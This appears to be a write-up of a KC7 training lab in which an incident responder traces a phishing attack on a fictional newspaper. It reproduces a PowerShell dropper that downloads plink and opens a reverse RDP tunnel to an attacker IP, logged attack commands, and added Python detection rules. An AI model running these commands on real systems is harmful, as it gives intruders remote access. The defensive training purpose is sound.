A Scandal in Valdoria

The first in a series focusing on the fictional city of Valdoria, and the second of KC7's easiest cases. This time around, we take on the role of an incident responder, focusing on an attack against the Valdorian Times that led to the publication of an unapproved, slanderous article against a political candidate written and planted by hostile third parties. This case has a training guide containing lore and basic KQL tips.

⚠️ The remainder of this introduction contains spoilers on the case. You may skip this section with the navigation. ⚠️

As is often the case, a fairly simple phishing email with just-enough information to be convincing and to elicit curiosity is more than enough to cause trouble.

The easiest thing is to tut-tut at the Editorial Intern for their carelessness (it's 2025, stop opening arbitrary files from strangers!), but the Valdorian Times as an organization could've had additional security measures in place to avoid something like this. For instance, despite there being a SecurityAlerts table (ostensibly populated by security software such as a SIEM tool), the malicious file was flagged on only 2 devices (belonging to two Directors of News Operations), despite being present on 8 other devices belonging to 8 distinct employees. There's also the fact that the malicious email got past whatever email filtering is in place; it's admittedly tricky to balance convenience (or just plain "allow people to do their jobs effectively") with security, but more fine-tuned rules could've been considered.

One also wonders what cybersecurity training has been given to the employees, if any.

And finally, more effective policies could've been set on employee devices to prevent the execution of arbitrary, unauthorized binaries (such as plink.exe and curl.exe). Windows actually has a few mechanisms built in: Software Restriction Policies (deprecated since Windows 10), AppLocker and Windows Defender Application Control.

Section 1 - KQL 101

Being a third party unrelated to the Valdorian Times prior to this incident, I decided to scope the organization itself before starting a proper investigation, using the following queries:

Employees
| count

There are 100 active employees in Valdorian Times; broken down by role:

Employees
| summarize count() by role
Query Results
role count_
Journalism Intern 13
Legal Affairs Specialist 9
Marketing Strategist 9
Quality Control Editor 7
HR Specialist 7
Reporter and Writer 6
Sports Reporter 5
Congressional Reporter 5
IT Specialist 5
Staff Writer 5
Director of News Operations 5
Lead Investigative Reporter 4
Advertising Sales Representative 4
Editorial Writer 3
Political Correspondent 3
Cultural Journalist 2
Chief Executive Officer 1
Editorial Director 1
General Counsel 1
Editorial Intern 1
Chief Financial Officer 1
NewsPaper Printer 1
Chief Journalism Officer 1
Senior Editor 1

And finally, sorting by hire date:

Employees
| sort by hire_date

The most recent hire (and the only one this year, 2024) is one Ronnie McLovin, Editorial Intern; KQL's sort by orders descending by default, so the newest row comes first.

Query Results
hire_date name user_agent ip_addr email_addr company_domain username role hostname
2024-01-02 08:00:00.0000 Ronnie McLovin Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36 10.10.0.19 ronnie_mclovin@valdoriantimes.news valdoriantimes.news romclovin Editorial Intern A37A-DESKTOP

Section 2 - Welcome to Valdoria!

Valdorian Times, ideally, only publishes articles once the Editorial Director gives them their final stamp of approval. Valdorian Times' current and highly esteemed Editorial Director is Nene Leaks, who most people suspect of having something to do with the controversial article (or otherwise been highly irresponsible in their duties to let such an article pass).

After contacting Nene Leaks (the Editorial Director in question), she suggested I ask Newspaper Printer Clark Kent -- the person in charge of printing the paper after the article(s) are approved, and thus the last person who sees the articles before publication.

Clark Kent is distressed; he simply printed the article that was sent to him as he always does; this article was sent by Ronnie McLovin, the sole Editorial Intern and the newest hire (see [1] and [2]). I can't discount the possibility of an insider threat.

Ronnie McLovin confirms they were in charge of the OpEds on the mayoral candidates, but admits to having overslept and never having sent the article. When told of Ronnie's claims, Clark Kent insists that Ronnie McLovin sent him an email on January 31st, 2024. We can confirm this:

Email
| where timestamp >= datetime(2024-01-31)
| where sender == "ronnie_mclovin@valdoriantimes.news"
and recipient == "clark_kent@valdoriantimes.news"
Query Results
timestamp sender reply_to recipient subject verdict link
2024-01-31 11:11:12.0000 ronnie_mclovin@valdoriantimes.news ronnie_mclovin@valdoriantimes.news clark_kent@valdoriantimes.news URGENT: Final OpEd Draft Edits (Please publish the following article in tomorrow's paper)) CLEAN https://sharepoint.valdoriantimes.news/files/rmclovin/2024/OpEdFinal_to_print.docx

As claimed by Clark Kent, it was sent by Ronnie McLovin (the email matches down to the domain) and was uploaded to the Valdorian Times' official, internal SharePoint instance.

The file is OpEdFinal_to_print.docx and the subject line emphasises urgency. Ronnie remains adamant that she didn't send the email and that the OpEd is not her work. Perhaps she is telling the truth.

Section 3 - Plenty of Phish

I was approached by an employee named Sonia Gose after a meeting with the Valdorian Times staff. She told me she had some information that may be relevant to the investigation.

Employees
| where name == "Sonia Gose"
Query Results
hire_date name user_agent ip_addr email_addr company_domain username role hostname
2018-11-17 11:45:25.0000 Sonia Gose Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.96 Safari/537.36 10.10.0.3 sonia_gose@valdoriantimes.news valdoriantimes.news sogose Senior Editor UL0M-MACHINE

Senior Editor Sonia Gose showed me a suspicious email she received a few weeks ago, on 2024-01-10 at 7:58 AM. The sender was newspaper_jobs@gmail.com, signed by Mike Smith of WeHireJournalists. Its subject line was [EXTERNAL] FW: Invitation to Apply: Lead Political Correspondent. The content of the body is reproduced below:

Hi, Sonia.

We are in search of Multimedia Journalists and we thought your experience was quite impressive. Would you consider applying? Click here to learn more about our open roles.

Sincerely.

Mike Smith
WeHireJournalists

After thanking Sonia Gose for this tip, I check her email logs:

Employees
| where name == "Sonia Gose"
| distinct email_addr
| lookup Email on $left.email_addr == $right.recipient
| where sender == "newspaper_jobs@gmail.com"
or reply_to == "newspaper_jobs@gmail.com"
Query Results
email_addr timestamp sender reply_to subject verdict link
sonia_gose@valdoriantimes.news 2024-01-05 09:42:05.0000 newspaper_jobs@gmail.com newspaper_jobs@gmail.com [EXTERNAL] FW: Invitation to Apply: Lead Political Correspondent CLEAN https://promotionrecruit.com/published/Valdorian_Times_Editorial_Offer_Letter.docx

Interestingly, the date is five days earlier than what Sonia showed me. The URL points to the domain promotionrecruit.com and a download of the file Valdorian_Times_Editorial_Offer_Letter.docx. Sonia doesn't remember whether she clicked the link. I can confirm it myself:

Employees
| where name == "Sonia Gose"
| distinct ip_addr
| lookup OutboundNetworkEvents on $left.ip_addr == $right.src_ip
| where url has "promotionrecruit.com"
Query Results
ip_addr timestamp method user_agent url
10.10.0.3 2024-01-05 10:23:17.0000 GET Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.96 Safari/537.36 https://promotionrecruit.com/published/Valdorian_Times_Editorial_Offer_Letter.docx

And so she did; since this screams "phishing email" and "malicious attachment", I decide to investigate what the file could've done on Sonia's computer.

Employees
| where name == "Sonia Gose"
| distinct hostname
| lookup FileCreationEvents on $left.hostname == $right.hostname
| where filename =~ "Valdorian_Times_Editorial_Offer_Letter.docx"
Query Results
hostname timestamp username sha256 path filename process_name
UL0M-MACHINE 2024-01-05 10:24:04.0000 sogose 60b854332e393a6a2f0015383969c3ac705126a6b7829b762057a3994967a61f C:\Users\sogose\Downloads\Valdorian_Times_Editorial_Offer_Letter.docx Valdorian_Times_Editorial_Offer_Letter.docx edge.exe

The file was saved to disk on 2024-01-05 at 10:24:04 in the morning, roughly 40 minutes after Sonia first received the email. VirusTotal doesn't return any results for this hash; this does not mean the file is safe.
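
The three lookups above (Employees to Email on the address, to OutboundNetworkEvents on the IP, to FileCreationEvents on the hostname) are one pivot chain. As an added example that is not part of the KC7 case or this writeup, the Python below follows that chain for a single employee over constructed rows shaped like the four tables: it returns the lure-to-disk timeline with minutes elapsed, and stops at whatever stage the evidence ends, which is the situation the case raises later (recipients who never clicked). "Jane Example", her IP, hostname and address are hypothetical; the Sonia Gose rows mirror the results already shown.

```python
from datetime import datetime
from urllib.parse import urlparse


def _ts(s):
    # Table timestamps look like "2024-01-05 09:42:05.0000"; the fraction is dropped.
    return datetime.strptime(s.split(".")[0], "%Y-%m-%d %H:%M:%S")


def _minutes_after(t0, s):
    return round((_ts(s) - t0).total_seconds() / 60, 1)


def phishing_timeline(employee, lure_sender, email_rows, net_rows, file_rows):
    """Follow one lure from inbox to disk for a single employee, pivoting on the
    same keys as the KQL lookups: email_addr -> recipient, ip_addr -> src_ip,
    hostname -> hostname. Returns [(stage, timestamp, minutes_since_email)] and
    stops at whatever stage the evidence ends (email only, clicked but not saved)."""
    lures = [e for e in email_rows
             if e["recipient"] == employee["email_addr"]
             and lure_sender in (e["sender"], e.get("reply_to"))]
    if not lures:
        return []
    lure = min(lures, key=lambda e: _ts(e["timestamp"]))
    t0 = _ts(lure["timestamp"])
    timeline = [("email", lure["timestamp"], 0.0)]

    clicks = [n for n in net_rows
              if n["src_ip"] == employee["ip_addr"] and n["url"] == lure["link"]
              and _ts(n["timestamp"]) >= t0]
    if not clicks:
        return timeline
    click = min(clicks, key=lambda n: _ts(n["timestamp"]))
    timeline.append(("click", click["timestamp"], _minutes_after(t0, click["timestamp"])))

    # The lure's file name is the last path segment of the link.
    filename = urlparse(lure["link"]).path.rsplit("/", 1)[-1]
    drops = [f for f in file_rows
             if f["hostname"] == employee["hostname"]
             and f["filename"].lower() == filename.lower()
             and _ts(f["timestamp"]) >= t0]
    if not drops:
        return timeline
    drop = min(drops, key=lambda f: _ts(f["timestamp"]))
    timeline.append(("file_on_disk", drop["timestamp"], _minutes_after(t0, drop["timestamp"])))
    return timeline


# Constructed rows mirroring the four tables queried above. "Jane Example" is a
# hypothetical employee who received the lure but never clicked it.
EMPLOYEES = {
    "Sonia Gose": {"email_addr": "sonia_gose@valdoriantimes.news", "ip_addr": "10.10.0.3", "hostname": "UL0M-MACHINE"},
    "Jane Example": {"email_addr": "jane_example@valdoriantimes.news", "ip_addr": "10.10.0.250", "hostname": "EXMP-LAPTOP"},
}
LURE = "https://promotionrecruit.com/published/Valdorian_Times_Editorial_Offer_Letter.docx"
EMAIL = [
    {"timestamp": "2024-01-05 09:42:05.0000", "sender": "newspaper_jobs@gmail.com", "reply_to": "newspaper_jobs@gmail.com",
     "recipient": "sonia_gose@valdoriantimes.news", "verdict": "CLEAN", "link": LURE},
    {"timestamp": "2024-01-05 09:42:05.0000", "sender": "newspaper_jobs@gmail.com", "reply_to": "newspaper_jobs@gmail.com",
     "recipient": "jane_example@valdoriantimes.news", "verdict": "CLEAN", "link": LURE},
]
OUTBOUND = [
    {"timestamp": "2024-01-05 10:23:17.0000", "src_ip": "10.10.0.3", "method": "GET", "url": LURE},
    {"timestamp": "2024-01-05 10:30:00.0000", "src_ip": "10.10.0.3", "method": "GET", "url": "https://www.example.com/"},
]
FILES = [
    {"timestamp": "2024-01-05 10:24:04.0000", "hostname": "UL0M-MACHINE",
     "filename": "Valdorian_Times_Editorial_Offer_Letter.docx", "process_name": "edge.exe"},
]

if __name__ == "__main__":
    for name, emp in EMPLOYEES.items():
        print(name, phishing_timeline(emp, "newspaper_jobs@gmail.com", EMAIL, OUTBOUND, FILES))
```

The click and file stages are tied to the lure's exact URL and file name rather than to "anything after the email", which keeps unrelated browsing from the same IP out of the timeline.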

I decide to check if the file was opened, and if so, check if anything strange happened.

Employees
| where name == "Sonia Gose"
| distinct hostname
| lookup ProcessEvents on $left.hostname == $right.hostname
| where timestamp >= datetime(2024-01-05 10:24:04.0000)
and process_commandline !contains "WindowsApps"
Query Results
This table has been redacted; it only shows the most relevant findings, rather than the entire output of the KQL query above.
hostname timestamp parent_process_name parent_process_hash process_commandline process_name process_hash username
UL0M-MACHINE 2024-01-05 10:24:31.0000 Explorer.exe 952f6a02d32145816641a1469a3493106874635c0dbf77a53a91ee606b9e7aa5 "C:\Program Files\Microsoft Office\Office16\WINWORD.EXE" "C:\Users\sogose\Downloads\Valdorian_Times_Editorial_Offer_Letter.docx" WINWORD.EXE d7890eb6d0a6e7c65d403bf9121fc76442b7397e4dad367be1720536526c4e06 sogose
UL0M-MACHINE 2024-01-05 10:24:32.0000 WINWORD.EXE 692ea0a131deceae887f86b85727cd5bdfa5bb3aa5be319251454467b5819ed8 C:\ProgramData\hacktivist_manifesto.ps1 hacktivist_manifesto.ps1 e8be07fad6781e7ebce9492958353b868501ab9ad67ac8eeb43eb8c71e9786b3 sogose
UL0M-MACHINE 2024-01-05 11:22:44.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f schtasks /create /sc hourly /mo 5 /tn "Hacktivist Manifesto" /tr "powershell.exe -ExecutionPolicy Bypass -File C:\ProgramData\hacktivist_manifesto.ps1" schtasks.exe e7534e5fc3af6bb3d24281e3d62bf11e46348a3471a0af815798a99e11405b3f sogose
UL0M-MACHINE 2024-01-05 11:55:22.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f powershell.exe -ExecutionPolicy Bypass -File C:\ProgramData\hacktivist_manifesto.ps1 powershell.exe 865d238395aaf940d92ed7daac56f37314ddbdb60c2fe92b32412e4cf0609db1 sogose
UL0M-MACHINE 2024-01-06 02:39:35.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f plink.exe -R 3389:localhost:3389 -ssh -l $had0w -pw thruthW!llS3tUfree 136.130.190.181 cmd.exe bcd891f6ef905def30065ad2ef7df60d1283835b5435b5c484b8e08153686eee sogose
UL0M-MACHINE 2024-01-06 07:30:44.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f whoami cmd.exe fb0868ac1091f8ab452cb8c09f0533b25281ec8e66f28c6943c5cb74308a3ab3 sogose
UL0M-MACHINE 2024-01-06 07:50:51.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f ipconfig cmd.exe 8a95c4e25f60c0e0781313f0ff7be9e761f353ab445409ad7d889fa04879726d sogose
UL0M-MACHINE 2024-01-06 08:08:17.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f arp -a cmd.exe fe30cbba9c227352d511bceef30b8a950c9e8e03a42bbe73dc14cf6763d25409 sogose
UL0M-MACHINE 2024-01-06 09:06:30.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f tasklist /svc cmd.exe 17c580e3b7900b0e9445890af5d3c92178edaef52d790866158f364f4fc58dc2 sogose
UL0M-MACHINE 2024-01-06 09:17:51.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f net view cmd.exe c67d734c5a3cacaf6b468b48d626444e9d8cd51471036d381a0dc28ba43c2732 sogose

Immediately after Sonia Gose opened the document Valdorian_Times_Editorial_Offer_Letter.docx, a new file was created and executed: hacktivist_manifesto.ps1, a PowerShell script. After some investigation, I found a sample of what said PowerShell script looks like on the inside; it is reproduced below. Note that some information, such as the attacker's IP address, may not match what was used on the affected Valdorian Times computers:

# Stealth Mode PowerShell Script to Invoke Plink and uncover da truth

[ASCII art expunged]

# green is a hackr color
$host.UI.RawUI.ForegroundColor = "Green"

# Define Plink URL and Destination Path
$plinkUrl = "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe"
$destinationPath = "C:\ProgramData\Temp\pLink.exe"

# let em know were here
Write-Host "lol ur bout 2 get pwnd..." -NoNewline
Start-Sleep -Seconds 2
Write-Host " Done."

# download plink and dont even be stealthy about it lol
Invoke-WebRequest -Uri $plinkUrl -OutFile $destinationPath

# make fun of the victim
Write-Host "loser haha :P" -NoNewline
Start-Sleep -Seconds 2
Write-Host " Ready."

# now run plink and get that juicy hands-on-keyboard babyyyyyyy
& $destinationPath -R 3389: localhost:3389 -ssh -1 $had@w -pw thruthW!l1S3tUfree 205.129.146.36

A rundown of what is going on in this code sample and in the commands previously uncovered on Sonia's computer (see [8]):

  1. The target opens the malicious file.
  2. The file drops (i.e. creates) another file, a PowerShell script.
  3. The PowerShell script is executed without any user interaction beyond having opened the false document in step 1.
  4. The PowerShell script downloads and executes plink.exe, a CLI tool by the PuTTY team. As explained in the user guide, it's a tool for remote access to other devices.
  5. A scheduled task named Hacktivist Manifesto is created; the PowerShell script is set to execute every 5 hours. This ensures persistence.
  6. The PowerShell script is executed with the ExecutionPolicy flag set to Bypass; this means anything and everything will be executed without presenting warnings or prompts to the user. See the official documentation. This prevents the script from being discovered as easily.
  7. plink.exe is executed; an SSH connection is made from the target to the attacker's device (IP address 136.130.190.181 in Sonia Gose's case), and the -R 3389:localhost:3389 option forwards port 3389 on the attacker's side back to port 3389 (RDP) on the target; the username is set as $had@w and the password is thruthW!l1S3tUfree [sic].
  8. The attacker now has control of the target computer.

In Sonia Gose's case, the attackers immediately ran discovery commands; a thorough examination of the recorded ProcessEvents shows that they quickly lost interest in Sonia Gose, likely looking for bigger (or more exploitable) fish to fry in the Valdorian Times. The discovery commands were:

  1. whoami: Displays user, group and privileges information for the user who is currently logged on to the local system. If used without parameters, whoami displays the current domain and user name. [Microsoft Learn].
  2. ipconfig: Displays all current TCP/IP network configuration values and refreshes Dynamic Host Configuration Protocol (DHCP) and Domain Name System (DNS) settings. Used without parameters, ipconfig displays Internet Protocol version 4 (IPv4) and IPv6 addresses, subnet mask, and default gateway for all adapters. [Microsoft Learn].
  3. arp -a: Displays and modifies entries in the Address Resolution Protocol (ARP) cache. The ARP cache contains one or more tables that are used to store IP addresses and their resolved Ethernet or Token Ring physical addresses. [...] To display the arp cache tables for all interfaces, use arp /a [Microsoft Learn].
  4. tasklist /svc: Displays a list of currently running processes on the local computer or on a remote computer. [/svc] [l]ists all the service information for each process without truncation. [Microsoft Learn].
  5. net view: Displays a list of domains, computers, or resources that are being shared by the specified computer. Used without parameters, net view displays a list of computers in your current domain. [Microsoft Learn].
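
Every step of the rundown and every command in the discovery list above is visible in ProcessEvents, so each can be turned into a detection rule. The Python below is an added example, not part of the KC7 case or this writeup: it runs five rules (Office spawning a script, schtasks /create persistence, -ExecutionPolicy Bypass, a plink -R reverse tunnel, and a burst of distinct discovery commands on one host) over constructed rows modelled on the table above. The rows reuse the UL0M-MACHINE timings, with the credentials replaced by placeholders; the three-hour window and the threshold of three distinct commands are my own assumptions, not values the case defines.

```python
import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta

# Indicators drawn from the chain observed on UL0M-MACHINE; extend as needed.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
SCRIPT_EXTS = (".ps1", ".vbs", ".js", ".bat", ".cmd", ".hta")
DISCOVERY_CMDS = ("whoami", "ipconfig", "arp", "tasklist", "net view", "net user", "net group", "systeminfo")
DISCOVERY_WINDOW = timedelta(hours=3)   # assumed; the case defines no such window
DISCOVERY_MIN_DISTINCT = 3              # assumed threshold


@dataclass(frozen=True)
class Finding:
    rule: str
    timestamp: str
    hostname: str
    detail: str


def _parse_ts(ts):
    # Table timestamps look like "2024-01-05 10:24:32.0000"; the fraction is dropped.
    return datetime.strptime(ts.split(".")[0], "%Y-%m-%d %H:%M:%S")


def _discovery_name(cmdline):
    cl = cmdline.strip().lower()
    for name in DISCOVERY_CMDS:
        if cl == name or cl.startswith(name + " "):
            return name
    return None


def analyze(events):
    """Run the five rules over ProcessEvents-shaped dicts and return a list of Finding."""
    findings = []
    discovery = defaultdict(list)   # hostname -> [(datetime, command name)]
    for ev in sorted(events, key=lambda e: _parse_ts(e["timestamp"])):
        host, ts = ev["hostname"], ev["timestamp"]
        parent = ev["parent_process_name"].lower()
        proc = ev["process_name"].lower()
        cl = ev["process_commandline"]
        low = cl.lower().strip()
        # Steps 2-3: an Office process spawning a script or a script host
        if parent in OFFICE_PARENTS and (proc in SCRIPT_HOSTS or proc.endswith(SCRIPT_EXTS)):
            findings.append(Finding("office_spawned_script", ts, host, f"{parent} -> {proc}"))
        # Step 5: scheduled-task persistence
        if low.startswith("schtasks") and "/create" in low:
            findings.append(Finding("schtasks_persistence", ts, host, cl))
        # Step 6: execution policy bypass (also matches the /tr payload of the task)
        if re.search(r"-(executionpolicy|ep|exec)\s+bypass", cl, re.IGNORECASE):
            findings.append(Finding("execution_policy_bypass", ts, host, cl))
        # Step 7: plink -R <port>:<host>:<port> publishes a local port on the SSH server
        if "plink" in low and re.search(r"\s-R\s+\d+:\S+:\d+", cl):
            findings.append(Finding("reverse_ssh_tunnel", ts, host, cl))
        # Discovery commands are collected per host and judged as a burst below
        name = _discovery_name(cl)
        if name:
            discovery[host].append((_parse_ts(ts), name))

    for host, seq in discovery.items():
        for i, (start, _) in enumerate(seq):
            seen = {n for t, n in seq[i:] if t - start <= DISCOVERY_WINDOW}
            if len(seen) >= DISCOVERY_MIN_DISTINCT:
                findings.append(Finding("discovery_burst", start.isoformat(" "),
                                        host, ", ".join(sorted(seen))))
                break   # one finding per host is enough for triage
    return findings


def _ev(ts, parent, proc, cmdline, host="UL0M-MACHINE"):
    return {"timestamp": ts, "hostname": host, "parent_process_name": parent,
            "process_name": proc, "process_commandline": cmdline}


# Constructed rows modelled on the ProcessEvents results above; credentials replaced by placeholders.
SAMPLE_EVENTS = [
    _ev("2024-01-05 10:24:31.0000", "Explorer.exe", "WINWORD.EXE",
        r'"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE" "C:\Users\sogose\Downloads\Valdorian_Times_Editorial_Offer_Letter.docx"'),
    _ev("2024-01-05 10:24:32.0000", "WINWORD.EXE", "hacktivist_manifesto.ps1",
        r"C:\ProgramData\hacktivist_manifesto.ps1"),
    _ev("2024-01-05 11:22:44.0000", "cmd.exe", "schtasks.exe",
        r'schtasks /create /sc hourly /mo 5 /tn "Hacktivist Manifesto" /tr "powershell.exe -ExecutionPolicy Bypass -File C:\ProgramData\hacktivist_manifesto.ps1"'),
    _ev("2024-01-05 11:55:22.0000", "cmd.exe", "powershell.exe",
        r"powershell.exe -ExecutionPolicy Bypass -File C:\ProgramData\hacktivist_manifesto.ps1"),
    _ev("2024-01-06 02:39:35.0000", "cmd.exe", "cmd.exe",
        "plink.exe -R 3389:localhost:3389 -ssh -l <user> -pw <password> 136.130.190.181"),
    _ev("2024-01-06 07:30:44.0000", "cmd.exe", "cmd.exe", "whoami"),
    _ev("2024-01-06 07:50:51.0000", "cmd.exe", "cmd.exe", "ipconfig"),
    _ev("2024-01-06 08:08:17.0000", "cmd.exe", "cmd.exe", "arp -a"),
    _ev("2024-01-06 09:06:30.0000", "cmd.exe", "cmd.exe", "tasklist /svc"),
    _ev("2024-01-06 09:17:51.0000", "cmd.exe", "cmd.exe", "net view"),
    _ev("2024-01-06 10:00:00.0000", "explorer.exe", "notepad.exe",
        r"notepad.exe C:\Users\sogose\notes.txt"),   # benign control row
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"{f.timestamp}  {f.hostname}  {f.rule}: {f.detail}")
```

The single-event rules fire on their own, but the discovery rule only fires on a cluster, which is what separates an admin typing ipconfig from the sequence seen here.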

Since there is nothing else of interest in Sonia Gose's computer, we must investigate elsewhere. It's highly likely she wasn't the only target within the Valdorian Times.

Section 4 - A Scandal

Before digging deeper into some leads, such as the attacker's IP addresses, I scoped the problem across Valdorian Times:

FileCreationEvents
| where filename =~ "hacktivist_manifesto.ps1"
Query Results
timestamp hostname username sha256 path filename process_name
2024-01-03 07:06:20.0000 LZD4-DESKTOP mazuckerberg 1c3ef0407d5714037504c52f7abfa86c081fd7a021b52e2abe8a669f92413252 C:\ProgramData\hacktivist_manifesto.ps1 hacktivist_manifesto.ps1 explorer.exe
2024-01-03 07:12:43.0000 CORG-DESKTOP kahopper 1c3ef0407d5714037504c52f7abfa86c081fd7a021b52e2abe8a669f92413252 C:\ProgramData\hacktivist_manifesto.ps1 hacktivist_manifesto.ps1 explorer.exe
2024-01-03 07:21:26.0000 O5HM-MACHINE idtarbell 4c199019661ef7ef79023e2c960617ec9a2f275ad578b1b1a027adb201c165f3 C:\ProgramData\hacktivist_manifesto.ps1 hacktivist_manifesto.ps1 explorer.exe
2024-01-03 07:22:45.0000 C0MC-MACHINE lapage 0e7e0e888f22b5cc83ce5f2560f9f331d89b8e02875e98ace822e074f2ee486b C:\ProgramData\hacktivist_manifesto.ps1 hacktivist_manifesto.ps1 explorer.exe
2024-01-03 07:35:24.0000 Q8CS-LAPTOP peparket 4c199019661ef7ef79023e2c960617ec9a2f275ad578b1b1a027adb201c165f3 C:\ProgramData\hacktivist_manifesto.ps1 hacktivist_manifesto.ps1 explorer.exe
2024-01-03 08:48:44.0000 PPKQ-LAPTOP neleaks 0e7e0e888f22b5cc83ce5f2560f9f331d89b8e02875e98ace822e074f2ee486b C:\ProgramData\hacktivist_manifesto.ps1 hacktivist_manifesto.ps1 explorer.exe
2024-01-05 09:57:10.0000 ER9X-DESKTOP cabernstein 4c199019661ef7ef79023e2c960617ec9a2f275ad578b1b1a027adb201c165f3 C:\ProgramData\hacktivist_manifesto.ps1 hacktivist_manifesto.ps1 explorer.exe
2024-01-05 10:02:25.0000 LSL7-DESKTOP bowoodward 0e7e0e888f22b5cc83ce5f2560f9f331d89b8e02875e98ace822e074f2ee486b C:\ProgramData\hacktivist_manifesto.ps1 hacktivist_manifesto.ps1 explorer.exe
2024-01-05 10:24:32.0000 UL0M-MACHINE sogose 1c3ef0407d5714037504c52f7abfa86c081fd7a021b52e2abe8a669f92413252 C:\ProgramData\hacktivist_manifesto.ps1 hacktivist_manifesto.ps1 explorer.exe
2024-01-05 10:37:15.0000 RBLC-LAPTOP darather 0e7e0e888f22b5cc83ce5f2560f9f331d89b8e02875e98ace822e074f2ee486b C:\ProgramData\hacktivist_manifesto.ps1 hacktivist_manifesto.ps1 explorer.exe
2024-01-08 08:06:19.0000 3FUX-MACHINE chniles 1c3ef0407d5714037504c52f7abfa86c081fd7a021b52e2abe8a669f92413252 C:\ProgramData\hacktivist_manifesto.ps1 hacktivist_manifesto.ps1 explorer.exe
2024-01-08 10:53:58.0000 8E37-LAPTOP litorvalds 1c3ef0407d5714037504c52f7abfa86c081fd7a021b52e2abe8a669f92413252 C:\ProgramData\hacktivist_manifesto.ps1 hacktivist_manifesto.ps1 explorer.exe
2024-01-09 08:10:47.0000 ZSD1-MACHINE tobrokaw 4c199019661ef7ef79023e2c960617ec9a2f275ad578b1b1a027adb201c165f3 C:\ProgramData\hacktivist_manifesto.ps1 hacktivist_manifesto.ps1 explorer.exe
2024-01-09 08:36:43.0000 1OD0-MACHINE bawalters 4c199019661ef7ef79023e2c960617ec9a2f275ad578b1b1a027adb201c165f3 C:\ProgramData\hacktivist_manifesto.ps1 hacktivist_manifesto.ps1 explorer.exe
2024-01-09 08:53:05.0000 W4PH-DESKTOP bigates 0e7e0e888f22b5cc83ce5f2560f9f331d89b8e02875e98ace822e074f2ee486b C:\ProgramData\hacktivist_manifesto.ps1 hacktivist_manifesto.ps1 explorer.exe
2024-01-09 09:37:05.0000 JJ2F-MACHINE tybyers 0e7e0e888f22b5cc83ce5f2560f9f331d89b8e02875e98ace822e074f2ee486b C:\ProgramData\hacktivist_manifesto.ps1 hacktivist_manifesto.ps1 explorer.exe
2024-01-10 08:55:51.0000 A37A-DESKTOP romclovin 1c3ef0407d5714037504c52f7abfa86c081fd7a021b52e2abe8a669f92413252 C:\ProgramData\hacktivist_manifesto.ps1 hacktivist_manifesto.ps1 explorer.exe
2024-01-10 09:04:39.0000 KOVZ-DESKTOP sehersh 1c3ef0407d5714037504c52f7abfa86c081fd7a021b52e2abe8a669f92413252 C:\ProgramData\hacktivist_manifesto.ps1 hacktivist_manifesto.ps1 explorer.exe
2024-01-10 09:41:37.0000 KOVZ-DESKTOP sehersh 0e7e0e888f22b5cc83ce5f2560f9f331d89b8e02875e98ace822e074f2ee486b C:\ProgramData\hacktivist_manifesto.ps1 hacktivist_manifesto.ps1 explorer.exe
2024-01-12 11:39:29.0000 FQEI-LAPTOP crzimmerman 0e7e0e888f22b5cc83ce5f2560f9f331d89b8e02875e98ace822e074f2ee486b C:\ProgramData\hacktivist_manifesto.ps1 hacktivist_manifesto.ps1 explorer.exe
2024-01-15 08:54:39.0000 WOJY-LAPTOP kebut 4c199019661ef7ef79023e2c960617ec9a2f275ad578b1b1a027adb201c165f3 C:\ProgramData\hacktivist_manifesto.ps1 hacktivist_manifesto.ps1 explorer.exe
2024-01-15 09:38:11.0000 MVBT-MACHINE stjobs 1c3ef0407d5714037504c52f7abfa86c081fd7a021b52e2abe8a669f92413252 C:\ProgramData\hacktivist_manifesto.ps1 hacktivist_manifesto.ps1 explorer.exe

The hacktivist_manifesto.ps1 file appears in 22 file creation events across 21 distinct hostnames (Lead Investigative Reporter Seymour Hersh had it dropped twice). The specific employees affected were:

FileCreationEvents
| where filename =~ "hacktivist_manifesto.ps1"
| distinct hostname
| lookup Employees on $left.hostname == $right.hostname
Query Results
hostname hire_date name user_agent ip_addr email_addr company_domain username role
KOVZ-DESKTOP 2014-06-13 07:42:03.0000 Seymour Hersh Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0 10.10.0.63 seymour_hersh@valdoriantimes.news valdoriantimes.news sehersh Lead Investigative Reporter
C0MC-MACHINE 2014-08-03 19:10:00.0000 Larry Page Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 10.0; Win64; x64; Trident/5.0) 10.10.0.97 larry_page@valdoriantimes.news valdoriantimes.news lapage IT Specialist
LZD4-DESKTOP 2014-08-25 17:19:29.0000 Mark Zuckerberg Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0 10.10.0.84 mark_zuckerberg@valdoriantimes.news valdoriantimes.news mazuckerberg IT Specialist
1OD0-MACHINE 2014-09-11 05:57:06.0000 Barbara Walters Mozilla/5.0 (Windows NT 6.2; rv:48.0) Gecko/20100101 Firefox/48.0 10.10.0.24 barbara_walters@valdoriantimes.news valdoriantimes.news bawalters Director of News Operations
